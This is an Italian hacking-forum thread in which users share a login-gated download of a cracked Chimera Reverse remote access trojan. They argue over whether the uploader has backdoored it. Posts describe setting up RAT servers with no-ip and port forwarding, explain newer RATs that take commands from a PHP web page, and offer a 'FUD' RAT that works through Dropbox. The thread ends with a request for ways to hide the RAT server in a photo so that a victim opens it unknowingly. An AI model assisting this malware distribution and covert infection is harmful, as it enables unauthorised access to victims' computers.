• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Info Ve lo ricordate il Chimera Reverse?

Balzy

Utente Medio
Autore del topic
19 Giugno 2011
131
0
Miglior risposta
0
Sul mio sito trovi il download di Chimera reverse cracked con il server!
Corretto il link che ora non porta più ad adfly!
E non ce bisogno di una scansione perché si va ad una pagina web, e l'ho trovato su internet.
Reputo quel sito ottimo!
Perfavore, Entra oppure Registrati per vedere i Link!
 
Ultima modifica:
Riferimento: Ve lo ricordate il Chimera Reverse?

E' uscito da più di un anno craccato.....
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Cneusor il link perchè porta ad adfly, inserisci il link corretto e se è un download posta anche la scansione entro 24 ore @paobalz
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Il link contiene virus :-) Non scaricatelo, il server non è craccato ma è il suo! Quindi quando invierete il "server" alla vittima non vi connetterete voi ma lui.
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Il link contiene virus :-) Non scaricatelo, il server non è craccato ma è il suo! Quindi quando invierete il "server" alla vittima non vi connetterete voi ma lui.


E' UN RAT... E' NORMALE CHE LO RIVELI COME VIRUS...

------------------------------------------------------------------------------------------------
Passiamo alle cose serie:
Ti rigrazio non si trovava piu' se trovi anche pro rat...
@AAmin Ti devo parlare
 
Ultima modifica:
Do ragione ad Uranio perché avendo acquistato chimera per la modica cifra di 50€, il file server è associato all'account no-ip che creavi. Non esiste uno universale. Quindi mandando il file fate un piacere a lui, visto che a voi non risulterà niente.
E comunque è anche una versione vecchia. Sarebbe bello trovare quella 2012
Inviato dal mio Nexus 4 LTE con Tapatalk 2
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Do ragione ad Uranio perché avendo acquistato chimera per la modica cifra di 50€, il file server è associato all'account no-ip che creavi. Non esiste uno universale. Quindi mandando il file fate un piacere a lui, visto che a voi non risulterà niente.
E comunque è anche una versione vecchia. Sarebbe bello trovare quella 2012
Inviato dal mio Nexus 4 LTE con Tapatalk 2

No con chimara compravi lo STUB (Server) e poi lo modificavi con l'editor.
 
Riferimento: Ve lo ricordate il Chimera Reverse?

No con chimara compravi lo STUB (Server) e poi lo modificavi con l'editor.

Quoto !
lo tengo anche io craccato, ed esiste in giro per il web da più di un anno.... :soso:

Non è nessun virus, ed è perfettamente funzionante.
 
Ultima modifica:
Riferimento: Ve lo ricordate il Chimera Reverse?

Se andate qui c'è anche il no-ip nel
Video in descrizione
Perfavore, Entra oppure Registrati per vedere i Link!
 
Riferimento: Ve lo ricordate il Chimera Reverse?

ci sono tante guide su internet :emoji_smiley:
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Il link porta a Playromm e bisogna abbonarsi:S
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Il portforwarding non e' stato mai il mio forte... non riesco a sbloccare nulla... vediamo se ora ci riesco.

Anchio ho avuto problemi a sbloccare le porte sul mio router/modem... il problema dipende al 90% dal router/mode che utilizzi,certi permettono lo sbloccaggio delle porte,mentre altri non possiedono questa funzione(e non ci puoi fare niente)...
Anche se io ho avuto problemi con un modem che permetteva lo sbloccaggio delle porte(in teoria),ma in pratica le porte non si sbloccavano.... nella configurazione dei Rat cè sempre stato questo tipo di problema...

Non so se ne siete a conoscenza,ma ormai stanno prendendo piede Rat più moderni,senza il solito utilizzo del No-ip per comunicare...
mi spiegho meglio: I server di questi nuovi rat non si collegheranno più alla porta,e al No-Ip per comunicare col client,ma si collegheranno ad una pagina web(che imposterete voi nella creazione del server) e prenderà i "comandi" da questa pagina(scritta in php).. e viceversa il client manderà i comandi alla stessa pagina,indicando i comandi che il server dovrà compiere... in poche parole la comunicazione tra Client e server(e viceversa) avviene tramite un pagina situata su un host....

Cosa cambia dai "vecchi" Rat ?
- Non ci sarà più bisogno di creare un account/un Ip su No-Ip.
- Non bisognerà più aprire le porte per comunicare col server.

E ci sono molti altri fattori positivi.(Ho evidenziato solo i due fattori più evidenti/importanti)
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Non capisco perchè sbattere la testa ad aprire le porte, sbattere la testa al FUD non FUD, buttare soldi al vento mha.
Non conoscete altri modi oltre a sti stupidi RAT ???

Ragazzi questo non è hacking.

Ci sono 1000 modi per entrare in un PC.
GRATIS. Avete mai sentito parlare di LINUX?

Dai ragazzi lo dico per il vostro bene.
Se volete imparare davvero. E non fare arricchire chi mangia alle vostre spalle.

:emoji_slight_smile:
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Non capisco perchè sbattere la testa ad aprire le porte, sbattere la testa al FUD non FUD, buttare soldi al vento mha.
Non conoscete altri modi oltre a sti stupidi RAT ???

Ragazzi questo non è hacking.

Ci sono 1000 modi per entrare in un PC.
GRATIS. Avete mai sentito parlare di LINUX?

Dai ragazzi lo dico per il vostro bene.
Se volete imparare davvero. E non fare arricchire chi mangia alle vostre spalle.

:emoji_slight_smile:

Ti posso passare un rat fud che funziona con dropbox se ti serve :emoji_smiley:
 
Riferimento: Ve lo ricordate il Chimera Reverse?

Su LInux tutto è possibile, naturalmente bisogna avere una media esperienza con quest'ultimo. Di software free ce ne sono a migliaia, ma a meno che non siamo noi degli hacker non ci saranno mai programmi adatti a questa funzione. ;)
 
Riferimento: Ve lo ricordate il Chimera Reverse?

ma a meno che non siamo noi degli hacker non ci saranno mai programmi adatti a questa funzione. ;)

Scherzi vero??? :emoji_slight_smile:
Spero proprio di si.........

Certo, questo forum non è per l hacking....ma se avete inserito anche questa sezione, dovrebbe esserci qualche utente un pò competente in materia.....
 
Ultima modifica:
Riferimento: Ve lo ricordate il Chimera Reverse?

ciao a tutti! volevo chiedervi conoscete dei programmini per nascondere il server che viene creato da chimera in una foto in modo che la vittima non sene accorga quando lo apre?? senò qualsiasi metodo per far aprire questo server nel pc della vittima??? grazie mille